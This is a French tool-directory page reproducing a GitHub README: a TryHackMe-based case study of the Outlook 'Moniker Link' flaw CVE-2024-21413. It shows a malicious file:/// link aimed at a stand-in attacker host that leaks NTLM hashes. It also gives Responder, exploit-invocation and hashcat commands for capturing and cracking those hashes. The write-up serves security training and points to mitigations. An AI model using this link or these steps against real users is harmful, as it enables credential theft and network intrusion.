Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Estudo-de-Caso-CVE-2024-21413 — Une étude de cas du CVE-2024-21413. Utilisé comme paramètre la salle TryHackMe Moniker Link (CVE-2024-21413). Des modifications ont été faites avec Claude code dans l'exploit. | Kitploit
Outils/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationMouvement LatéralHameçonnageCTFApprentissage et ÉducationSécurité des EmailsLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubpedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

Une étude de cas du CVE-2024-21413. Utilisé comme paramètre la salle TryHackMe Moniker Link (CVE-2024-21413). Des modifications ont été faites avec Claude code dans l'exploit.

Voir le dépôt
9il y a 5 moisPas encore vérifié

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + Fuite d'identifiants NTLM

⚠️ Avis juridique : Ce dépôt est exclusivement destiné à des fins éducatives et de recherche en sécurité. Toutes les démonstrations ont été réalisées dans des environnements contrôlés et isolés. L'utilisation de ces techniques contre des systèmes sans autorisation explicite est illégale et contraire à l'éthique.


📋 Table des matières

  • Vue d'ensemble
  • Fonctionnement de la vulnérabilité
  • Environnement de laboratoire
  • Démonstration étape par étape
  • Script de l'exploit
  • Diagramme de l'attaque
  • Atténuation et défense
  • CVE Breakdown
  • Références

🔍 Vue d'ensemble

ChampDétail
CVECVE-2024-21413
Divulgation13 février 2024 (Patch Tuesday)
CVSS Score9.8 (Critique)
ProduitMicrosoft Outlook
TypeRCE + Fuite d'identifiants (hash NTLM)
VecteurRéseau / E-mail (sans authentification préalable)
InteractionNécessite une interaction de l'utilisateur (clic sur le lien)
SurnomMoniker Link

La CVE-2024-21413 est une vulnérabilité critique dans Microsoft Outlook qui permet à un attaquant :

  1. Faire fuiter les identifiants NTLM de la victime en forçant une authentification SMB automatique
  2. Exécuter du code à distance sur la machine cible via un lien malveillant dans un e-mail

Le nom "Moniker Link" vient de l'exploitation des Monikers COM (Component Object Model) — un mécanisme Windows permettant de référencer des objets par chaîne — pour contourner les protections d'Outlook contre les liens file://.


🧠 Fonctionnement de la vulnérabilité

Le problème : Contournement de la Protected View

Normalement, Outlook bloque les liens file:// pointant vers des ressources réseau, affichant un avertissement de sécurité (Protected View). La faille réside dans la façon dont Outlook traite les URL contenant le caractère ! — un séparateur de Moniker.

L'exploitation

Un lien malveillant au format :

root@kitploit:~
file:///\\ATTACKER_IP\share\!something

Le caractère ! fait que l'analyseur d'Outlook interprète l'URL comme une référence à un Moniker COM, ignorant les vérifications de sécurité normales. Le résultat :

  • La machine de la victime tente de s'authentifier automatiquement via SMB sur le serveur de l'attaquant
  • Pendant cette authentification, le hash NTLM de la victime est transmis
  • Ce hash peut être utilisé dans des attaques Pass-the-Hash ou cassé hors ligne

Flux simplifié

root@kitploit:~
L'attaquant envoie un e-mail → La victime clique sur le lien → Outlook traite l'URL avec "!"
→ Contournement de la Protected View → Connexion SMB automatique → Hash NTLM capturé

🖥️ Environnement de laboratoire

Pour reproduire cette étude de cas en toute sécurité :

MachineSystème d'exploitationRôle
AttaquantKali LinuxListener SMB + Exploit
CibleWindows 10/11 avec Outlook vulnérableVictime

Important : Utilisez un réseau isolé (NAT ou Host-Only dans VirtualBox/VMware). Ne jamais exécuter sur des réseaux réels.

Outils nécessaires

root@kitploit:~
# Responder — listener SMB/HTTP pour la capture de hashes
sudo apt install responder

# Python 3 — pour exécuter l'exploit
python3 --version

# Vérifier la connectivité entre les machines
ping <IP_ALVO>

🚀 Démonstration étape par étape

Étape 1 — Identifier l'IP de la machine attaquante

root@kitploit:~
ip a | grep inet
# Notez l'IP de l'interface qui communique avec la cible (ex: 192.168.56.10)

Étape 2 — Démarrer Responder

Responder crée un faux serveur SMB qui capture les hashes d'authentification NTLM.

root@kitploit:~
sudo responder -I eth0 -v
# Remplacez eth0 par votre interface réseau

Sortie attendue :

root@kitploit:~
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ALVO\usuario
[SMB] NTLMv2-SSP Hash     : usuario::DESKTOP-ALVO:...

Étape 3 — Exécuter l'exploit

root@kitploit:~
python3 exploit.py \
  --sender [email protected] \
  --recipient [email protected] \
  --server <IP_SERVIDOR_EMAIL> \
  --attacker-ip 192.168.56.10

Étape 4 — Attendre que la victime clique sur le lien

Lorsque la victime ouvre l'e-mail et clique sur le lien, Responder capture automatiquement le hash NTLM. Ce hash peut être :

  • Analysé pour identifier le compte compromis
  • Utilisé dans une attaque Pass-the-Hash pour une authentification latérale sur le réseau
  • Soumis à Hashcat/John pour une tentative de cassage hors ligne :
root@kitploit:~
hashcat -m 5600 hash.txt wordlist.txt

🐍 Script de l'exploit

Voir le fichier exploit.py pour le script complet et commenté.


📊 Diagramme de l'attaque

Voir le fichier diagrama-ataque.html pour une visualisation interactive du flux complet de l'attaque.


🛡️ Atténuation et défense

Voir le fichier MITIGACAO.md pour le guide complet d'atténuation et de défense.


📄 CVE Breakdown

Voir le fichier CVE-BREAKDOWN.md pour l'analyse technique détaillée de la vulnérabilité.


📚 Références

  • Microsoft Security Advisory — CVE-2024-21413
  • Morphisec — Moniker Link Research
  • TryHackMe — Moniker Link Room
  • Responder Tool — GitHub
  • NTLM Authentication — Microsoft Docs
  • NVD — CVE-2024-21413

👤 Auteur

Étude de cas développée dans le cadre d'une formation pratique en sécurité offensive via TryHackMe.

Ce projet suit les principes de responsible disclosure et d'ethical hacking. Tout le contenu présent ici vise l'éducation et l'amélioration de la posture de sécurité.

Télécharger l’outil